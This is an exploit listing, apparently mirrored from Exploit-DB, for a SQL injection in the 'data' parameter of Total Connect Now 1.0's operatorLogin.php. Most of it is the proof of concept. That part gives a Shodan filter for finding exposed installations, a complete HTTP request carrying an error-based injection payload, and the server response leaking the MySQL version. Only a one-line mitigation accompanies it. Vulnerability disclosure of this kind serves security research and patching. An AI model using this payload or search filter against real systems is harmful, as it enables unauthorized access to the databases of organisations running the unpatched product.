Unified Office Total Connect Now 1.0 – 'data' SQL Injection

vendor:

Total Connect Now

by:

Ajaikumar Nadar

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Total Connect Now

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:unified_office:total_connect_now:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: CentOS + Apache/2.2.15

2021

Unified Office Total Connect Now 1.0 – ‘data’ SQL Injection

An attacker can exploit a SQL injection vulnerability in Unified Office Total Connect Now 1.0 by sending a malicious payload in the 'data' parameter of the 'operatorLogin.php' page. The payload can be used to extract the version of the database. The request is captured in Burpsuite and the response reveals the DB version of mysql.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Unified Office Total Connect Now 1.0 – 'data' SQL Injection
# Shodan Filter: http.title:"TCN User Dashboard"
# Date: 06-16-2021
# Exploit Author: Ajaikumar Nadar
# Vendor Homepage: https://unifiedoffice.com/
# Software Link: https://unifiedoffice.com/voip-business-solutions/
# Version: 1.0
# Tested on: CentOS + Apache/2.2.15

POC:
1. Go to url http://localhost/operator/operatorLogin.php and login
2. Capture the request in Burpsuite and use the payload as given below.
3. Observe the response which reveals the DB version of mysql.

Request:

POST /operator/operatorLogin.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 178
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/operator/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81

data={"extension":"((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))","pin":"bar"}


Response:

HTTP/1.1 400 Bad Request
Date: Wed, 16 Jun 2021 12:49:56 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 139
Connection: close
Content-Type: text/html; charset=UTF-8

Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key'